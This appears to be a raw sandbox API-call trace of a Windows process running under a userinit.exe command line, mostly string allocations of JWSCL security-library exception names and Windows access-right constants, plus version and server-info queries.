[0100.135] SysReAllocStringLen (in: pbstr=0x29bf258*=0x0, psz="EJwsclInvalidFlagsException", len=0x1b | out: pbstr=0x29bf258*="EJwsclInvalidFlagsException") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf240*=0x0, psz="EJwsclProcessNotFound", len=0x15 | out: pbstr=0x29bf240*="EJwsclProcessNotFound") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf228*=0x0, psz="EJwsclInvalidParameterException", len=0x1f | out: pbstr=0x29bf228*="EJwsclInvalidParameterException") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf210*=0x0, psz="EJwsclInvalidPathException", len=0x1a | out: pbstr=0x29bf210*="EJwsclInvalidPathException") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf1f8*=0x0, psz="EJwsclInvalidSecurityDescriptor", len=0x1f | out: pbstr=0x29bf1f8*="EJwsclInvalidSecurityDescriptor") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf1e0*=0x0, psz="EJwsclInvalidRevision", len=0x15 | out: pbstr=0x29bf1e0*="EJwsclInvalidRevision") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf1c8*=0x0, psz="EJwsclInvalidAceMismatch", len=0x18 | out: pbstr=0x29bf1c8*="EJwsclInvalidAceMismatch") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf1b0*=0x0, psz="EJwsclRevisionMismatchException", len=0x1f | out: pbstr=0x29bf1b0*="EJwsclRevisionMismatchException") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf198*=0x0, psz="EJwsclInvalidACEException", len=0x19 | out: pbstr=0x29bf198*="EJwsclInvalidACEException") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf180*=0x0, psz="EJwsclReadOnlyPropertyException", len=0x1f | out: pbstr=0x29bf180*="EJwsclReadOnlyPropertyException") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf168*=0x0, psz="EJwsclDuplicateListEntryException", len=0x21 | out: pbstr=0x29bf168*="EJwsclDuplicateListEntryException") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf150*=0x0, psz="EJwsclIndexOutOfBoundsException", len=0x1f | out: pbstr=0x29bf150*="EJwsclIndexOutOfBoundsException") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf138*=0x0, psz="EJwsclInvalidSidAuthorityValue", len=0x1e | out: pbstr=0x29bf138*="EJwsclInvalidSidAuthorityValue") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf120*=0x0, psz="EJwsclInvalidKnownSIDException", len=0x1e | out: pbstr=0x29bf120*="EJwsclInvalidKnownSIDException") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf108*=0x0, psz="EJwsclInvalidComputer", len=0x15 | out: pbstr=0x29bf108*="EJwsclInvalidComputer") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf0f0*=0x0, psz="EJwsclInvalidGroupSIDException", len=0x1e | out: pbstr=0x29bf0f0*="EJwsclInvalidGroupSIDException") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf0d8*=0x0, psz="EJwsclInvalidOwnerSIDException", len=0x1e | out: pbstr=0x29bf0d8*="EJwsclInvalidOwnerSIDException") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf0c0*=0x0, psz="EJwsclInvalidSIDException", len=0x19 | out: pbstr=0x29bf0c0*="EJwsclInvalidSIDException") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf0a8*=0x0, psz="EJwsclInvalidSecurityListException", len=0x22 | out: pbstr=0x29bf0a8*="EJwsclInvalidSecurityListException") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf090*=0x0, psz="EJwsclInvalidMandatoryLevelException", len=0x24 | out: pbstr=0x29bf090*="EJwsclInvalidMandatoryLevelException") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf078*=0x0, psz="EJwsclEmptyACLException", len=0x17 | out: pbstr=0x29bf078*="EJwsclEmptyACLException") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf060*=0x0, psz="EJwsclNILParameterException", len=0x1b | out: pbstr=0x29bf060*="EJwsclNILParameterException") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf048*=0x0, psz="EJwsclInheritanceSourceNotSupportedException", len=0x2c | out: pbstr=0x29bf048*="EJwsclInheritanceSourceNotSupportedException") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf030*=0x0, psz="EJwsclInvalidObjectArrayException", len=0x21 | out: pbstr=0x29bf030*="EJwsclInvalidObjectArrayException") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf018*=0x0, psz="EJwsclProcessIdNotAvailable", len=0x1b | out: pbstr=0x29bf018*="EJwsclProcessIdNotAvailable") returned 1
[0100.136] SysReAllocStringLen (in: pbstr=0x29bf000*=0x0, psz="EJwsclWinCallFailedException", len=0x1c | out: pbstr=0x29bf000*="EJwsclWinCallFailedException") returned 1
[0100.136] SysReAllocStringLen (in: pbstr=0x29befe8*=0x0, psz="EJwsclUnsupportedWindowsVersionException", len=0x28 | out: pbstr=0x29befe8*="EJwsclUnsupportedWindowsVersionException") returned 1
[0100.136] SysReAllocStringLen (in: pbstr=0x29befd0*=0x0, psz="EJwsclNotImplementedException", len=0x1d | out: pbstr=0x29befd0*="EJwsclNotImplementedException") returned 1
[0100.136] SysReAllocStringLen (in: pbstr=0x29befb8*=0x0, psz="EJwsclAccessTypeException", len=0x19 | out: pbstr=0x29befb8*="EJwsclAccessTypeException") returned 1
[0100.136] SysReAllocStringLen (in: pbstr=0x29befa0*=0x0, psz="EJwsclAdjustPrivilegeException", len=0x1e | out: pbstr=0x29befa0*="EJwsclAdjustPrivilegeException") returned 1
[0100.136] SysReAllocStringLen (in: pbstr=0x29bef88*=0x0, psz="EJwsclPrivilegeCheckException", len=0x1d | out: pbstr=0x29bef88*="EJwsclPrivilegeCheckException") returned 1
[0100.136] SysReAllocStringLen (in: pbstr=0x29bef70*=0x0, psz="EJwsclPrivilegeNotFoundException", len=0x20 | out: pbstr=0x29bef70*="EJwsclPrivilegeNotFoundException") returned 1
[0100.136] SysReAllocStringLen (in: pbstr=0x29bef58*=0x0, psz="EJwsclInvalidIndexPrivilegeException", len=0x24 | out: pbstr=0x29bef58*="EJwsclInvalidIndexPrivilegeException") returned 1
[0100.136] SysReAllocStringLen (in: pbstr=0x29bef40*=0x0, psz="EJwsclPrivilegeException", len=0x18 | out: pbstr=0x29bef40*="EJwsclPrivilegeException") returned 1
[0100.136] SysReAllocStringLen (in: pbstr=0x29bef28*=0x0, psz="EJwsclNotEnoughMemory", len=0x15 | out: pbstr=0x29bef28*="EJwsclNotEnoughMemory") returned 1
[0100.136] SysReAllocStringLen (in: pbstr=0x29bef10*=0x0, psz="EJwsclInvalidTokenHandle", len=0x18 | out: pbstr=0x29bef10*="EJwsclInvalidTokenHandle") returned 1
[0100.136] SysReAllocStringLen (in: pbstr=0x29beef8*=0x0, psz="EJwsclNoThreadTokenAvailable", len=0x1c | out: pbstr=0x29beef8*="EJwsclNoThreadTokenAvailable") returned 1
[0100.136] SysReAllocStringLen (in: pbstr=0x29beee0*=0x0, psz="EJwsclDuplicateTokenException", len=0x1d | out: pbstr=0x29beee0*="EJwsclDuplicateTokenException") returned 1
[0100.136] SysReAllocStringLen (in: pbstr=0x29beec8*=0x0, psz="EJwsclInvalidOwnerException", len=0x1b | out: pbstr=0x29beec8*="EJwsclInvalidOwnerException") returned 1
[0100.136] SysReAllocStringLen (in: pbstr=0x29beeb0*=0x0, psz="EJwsclInvalidPrimaryToken", len=0x19 | out: pbstr=0x29beeb0*="EJwsclInvalidPrimaryToken") returned 1
[0100.136] SysReAllocStringLen (in: pbstr=0x29bee98*=0x0, psz="EJwsclTokenPrimaryException", len=0x1b | out: pbstr=0x29bee98*="EJwsclTokenPrimaryException") returned 1
[0100.136] SysReAllocStringLen (in: pbstr=0x29bee80*=0x0, psz="EJwsclTokenImpersonationException", len=0x21 | out: pbstr=0x29bee80*="EJwsclTokenImpersonationException") returned 1
[0100.136] SysReAllocStringLen (in: pbstr=0x29bee68*=0x0, psz="EJwsclTokenInformationException", len=0x1f | out: pbstr=0x29bee68*="EJwsclTokenInformationException") returned 1
[0100.136] SysReAllocStringLen (in: pbstr=0x29bee50*=0x0, psz="EJwsclSharedTokenException", len=0x1a | out: pbstr=0x29bee50*="EJwsclSharedTokenException") returned 1
[0100.136] SysReAllocStringLen (in: pbstr=0x29bee38*=0x0, psz="EJwsclOpenProcessTokenException", len=0x1f | out: pbstr=0x29bee38*="EJwsclOpenProcessTokenException") returned 1
[0100.136] SysReAllocStringLen (in: pbstr=0x29bee20*=0x0, psz="EJwsclOpenThreadTokenException", len=0x1e | out: pbstr=0x29bee20*="EJwsclOpenThreadTokenException") returned 1
[0100.136] SysReAllocStringLen (in: pbstr=0x29bee08*=0x0, psz="EJwsclSecurityException", len=0x17 | out: pbstr=0x29bee08*="EJwsclSecurityException") returned 1
[0100.136] SysReAllocStringLen (in: pbstr=0x29bedf0*=0x0, psz="Exception", len=0x9 | out: pbstr=0x29bedf0*="Exception") returned 1
[0100.136] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0100.136] GetProcAddress (hModule=0x75370000, lpProcName="GetVersionExA") returned 0x753c3861
[0100.136] GetVersionExA (in: lpVersionInformation=0xef45c*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x76a6ea43, dwMinorVersion=0x270000, dwBuildNumber=0x0, dwPlatformId=0x10, szCSDVersion="\x84\xf4\x0e") | out: lpVersionInformation=0xef45c*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0100.136] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x0
[0100.136] LoadLibraryA (lpLibFileName="netapi32.dll") returned 0x73b10000
[0100.142] GetProcAddress (hModule=0x73b10000, lpProcName="NetServerGetInfo") returned 0x74f13cfa
[0100.142] NetServerGetInfo (in: servername="", level=0x65, bufptr=0xef4e0 | out: bufptr=0xef4e0) returned 0x0
[0100.224] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x73b10000
[0100.224] GetProcAddress (hModule=0x73b10000, lpProcName="NetApiBufferFree") returned 0x73b013d2
[0100.224] NetApiBufferFree (Buffer=0x291d00) returned 0x0
[0100.224] SetErrorMode (uMode=0x8000) returned 0x1
[0100.224] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x758f0000
[0100.225] SetErrorMode (uMode=0x1) returned 0x8000
[0100.225] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0100.226] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0100.228] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0100.229] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0100.230] SysReAllocStringLen (in: pbstr=0x29bec40*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29bec40*="DELETE") returned 1
[0100.230] SysReAllocStringLen (in: pbstr=0x29bec30*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29bec30*="READ_CONTROL") returned 1
[0100.230] SysReAllocStringLen (in: pbstr=0x29bec20*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29bec20*="WRITE_OWNER") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29bec10*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29bec10*="WRITE_DAC") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29bec00*=0x0, psz="FILE_WRITE_ATTRIBUTES", len=0x15 | out: pbstr=0x29bec00*="FILE_WRITE_ATTRIBUTES") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29bebf0*=0x0, psz="FILE_READ_ATTRIBUTES", len=0x14 | out: pbstr=0x29bebf0*="FILE_READ_ATTRIBUTES") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29bebe0*=0x0, psz="FILE_CREATE_PIPE_INSTANCE", len=0x19 | out: pbstr=0x29bebe0*="FILE_CREATE_PIPE_INSTANCE") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29bebd0*=0x0, psz="FILE_WRITE_DATA", len=0xf | out: pbstr=0x29bebd0*="FILE_WRITE_DATA") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29bebc0*=0x0, psz="FILE_READ_DATA", len=0xe | out: pbstr=0x29bebc0*="FILE_READ_DATA") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29bebb0*=0x0, psz="FILE_ALL_ACCESS", len=0xf | out: pbstr=0x29bebb0*="FILE_ALL_ACCESS") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29beba0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29beba0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29beb90*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29beb90*="STANDARD_RIGHTS_WRITE") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29beb80*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29beb80*="STANDARD_RIGHTS_READ") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29beb70*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29beb70*="STANDARD_RIGHTS_ALL") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29beb50*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29beb50*="DELETE") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29beb40*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29beb40*="READ_CONTROL") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29beb30*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29beb30*="WRITE_OWNER") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29beb20*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29beb20*="WRITE_DAC") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29beb10*=0x0, psz="TOKEN_ADJUST_SESSIONID", len=0x16 | out: pbstr=0x29beb10*="TOKEN_ADJUST_SESSIONID") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29beb00*=0x0, psz="TOKEN_ADJUST_DEFAULT", len=0x14 | out: pbstr=0x29beb00*="TOKEN_ADJUST_DEFAULT") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29beaf0*=0x0, psz="TOKEN_ADJUST_GROUPS", len=0x13 | out: pbstr=0x29beaf0*="TOKEN_ADJUST_GROUPS") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29beae0*=0x0, psz="TOKEN_ADJUST_PRIVILEGES", len=0x17 | out: pbstr=0x29beae0*="TOKEN_ADJUST_PRIVILEGES") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29bead0*=0x0, psz="TOKEN_QUERY_SOURCE", len=0x12 | out: pbstr=0x29bead0*="TOKEN_QUERY_SOURCE") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29beac0*=0x0, psz="TOKEN_QUERY", len=0xb | out: pbstr=0x29beac0*="TOKEN_QUERY") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29beab0*=0x0, psz="TOKEN_IMPERSONATE", len=0x11 | out: pbstr=0x29beab0*="TOKEN_IMPERSONATE") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29beaa0*=0x0, psz="TOKEN_DUPLICATE", len=0xf | out: pbstr=0x29beaa0*="TOKEN_DUPLICATE") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29bea90*=0x0, psz="TOKEN_ASSIGN_PRIMARY", len=0x14 | out: pbstr=0x29bea90*="TOKEN_ASSIGN_PRIMARY") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29bea80*=0x0, psz="TOKEN_ALL_ACCESS", len=0x10 | out: pbstr=0x29bea80*="TOKEN_ALL_ACCESS") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29bea70*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29bea70*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29bea60*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29bea60*="STANDARD_RIGHTS_WRITE") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29bea50*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29bea50*="STANDARD_RIGHTS_READ") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29bea40*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29bea40*="STANDARD_RIGHTS_ALL") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29bea30*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29bea30*="DELETE") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29bea20*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29bea20*="READ_CONTROL") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29bea10*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29bea10*="WRITE_OWNER") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29bea00*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29bea00*="WRITE_DAC") returned 1
[0100.231] SysReAllocStringLen (in: pbstr=0x29be9f0*=0x0, psz="TIMER_MODIFY_STATE", len=0x12 | out: pbstr=0x29be9f0*="TIMER_MODIFY_STATE") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be9e0*=0x0, psz="TIMER_QUERY_STATE", len=0x11 | out: pbstr=0x29be9e0*="TIMER_QUERY_STATE") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be9d0*=0x0, psz="TIMER_ALL_ACCESS", len=0x10 | out: pbstr=0x29be9d0*="TIMER_ALL_ACCESS") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be9c0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29be9c0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be9b0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29be9b0*="STANDARD_RIGHTS_WRITE") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be9a0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29be9a0*="STANDARD_RIGHTS_READ") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be990*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29be990*="STANDARD_RIGHTS_ALL") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be980*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29be980*="DELETE") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be970*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29be970*="READ_CONTROL") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be960*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29be960*="WRITE_OWNER") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be950*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29be950*="WRITE_DAC") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be940*=0x0, psz="SECTION_EXTEND_SIZE", len=0x13 | out: pbstr=0x29be940*="SECTION_EXTEND_SIZE") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be930*=0x0, psz="FILE_MAP_READ", len=0xd | out: pbstr=0x29be930*="FILE_MAP_READ") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be920*=0x0, psz="FILE_MAP_WRITE", len=0xe | out: pbstr=0x29be920*="FILE_MAP_WRITE") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be910*=0x0, psz="FILE_MAP_COPY", len=0xd | out: pbstr=0x29be910*="FILE_MAP_COPY") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be900*=0x0, psz="FILE_MAP_ALL_ACCESS", len=0x13 | out: pbstr=0x29be900*="FILE_MAP_ALL_ACCESS") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be8f0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29be8f0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be8e0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29be8e0*="STANDARD_RIGHTS_WRITE") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be8d0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29be8d0*="STANDARD_RIGHTS_READ") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be8c0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29be8c0*="STANDARD_RIGHTS_ALL") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be8b0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29be8b0*="DELETE") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be8a0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29be8a0*="READ_CONTROL") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be890*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29be890*="WRITE_OWNER") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be880*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29be880*="WRITE_DAC") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be870*=0x0, psz="MUTEX_MODIFY_STATE", len=0x12 | out: pbstr=0x29be870*="MUTEX_MODIFY_STATE") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be860*=0x0, psz="MUTEX_ALL_ACCESS", len=0x10 | out: pbstr=0x29be860*="MUTEX_ALL_ACCESS") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be850*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29be850*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be840*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29be840*="STANDARD_RIGHTS_WRITE") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be830*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29be830*="STANDARD_RIGHTS_READ") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be820*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29be820*="STANDARD_RIGHTS_ALL") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be810*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29be810*="DELETE") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be800*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29be800*="READ_CONTROL") returned 1
[0100.232] SysReAllocStringLen (in: pbstr=0x29be7f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29be7f0*="WRITE_OWNER") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be7e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29be7e0*="WRITE_DAC") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be7d0*=0x0, psz="EVENT_MODIFY_STATE", len=0x12 | out: pbstr=0x29be7d0*="EVENT_MODIFY_STATE") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be7c0*=0x0, psz="EVENT_ALL_ACCESS", len=0x10 | out: pbstr=0x29be7c0*="EVENT_ALL_ACCESS") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be7b0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29be7b0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be7a0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29be7a0*="STANDARD_RIGHTS_WRITE") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be790*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29be790*="STANDARD_RIGHTS_READ") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be780*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29be780*="STANDARD_RIGHTS_ALL") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be770*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29be770*="DELETE") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be760*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29be760*="READ_CONTROL") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be750*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29be750*="WRITE_OWNER") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be740*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29be740*="WRITE_DAC") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be730*=0x0, psz="SEMAPHORE_MODIFY_STATE", len=0x16 | out: pbstr=0x29be730*="SEMAPHORE_MODIFY_STATE") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be720*=0x0, psz="SEMAPHORE_ALL_ACCESS", len=0x14 | out: pbstr=0x29be720*="SEMAPHORE_ALL_ACCESS") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be710*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29be710*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be700*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29be700*="STANDARD_RIGHTS_WRITE") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be6f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29be6f0*="STANDARD_RIGHTS_READ") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be6e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x29be6e0*="STANDARD_RIGHTS_ALL") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be6d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x29be6d0*="DELETE") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be6c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x29be6c0*="READ_CONTROL") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be6b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x29be6b0*="WRITE_OWNER") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be6a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x29be6a0*="WRITE_DAC") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be690*=0x0, psz="JOB_OBJECT_SET_SECURITY_ATTRIBUTES", len=0x22 | out: pbstr=0x29be690*="JOB_OBJECT_SET_SECURITY_ATTRIBUTES") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be680*=0x0, psz="JOB_OBJECT_TERMINATE", len=0x14 | out: pbstr=0x29be680*="JOB_OBJECT_TERMINATE") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be670*=0x0, psz="JOB_OBJECT_QUERY", len=0x10 | out: pbstr=0x29be670*="JOB_OBJECT_QUERY") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be660*=0x0, psz="JOB_OBJECT_SET_ATTRIBUTES", len=0x19 | out: pbstr=0x29be660*="JOB_OBJECT_SET_ATTRIBUTES") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be650*=0x0, psz="JOB_OBJECT_ASSIGN_PROCESS", len=0x19 | out: pbstr=0x29be650*="JOB_OBJECT_ASSIGN_PROCESS") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be640*=0x0, psz="JOB_OBJECT_ALL_ACCESS", len=0x15 | out: pbstr=0x29be640*="JOB_OBJECT_ALL_ACCESS") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be630*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x29be630*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be620*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x29be620*="STANDARD_RIGHTS_WRITE") returned 1
[0100.233] SysReAllocStringLen (in: pbstr=0x29be610*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x29be610*="STANDARD_RIGHTS_READ") returned 1
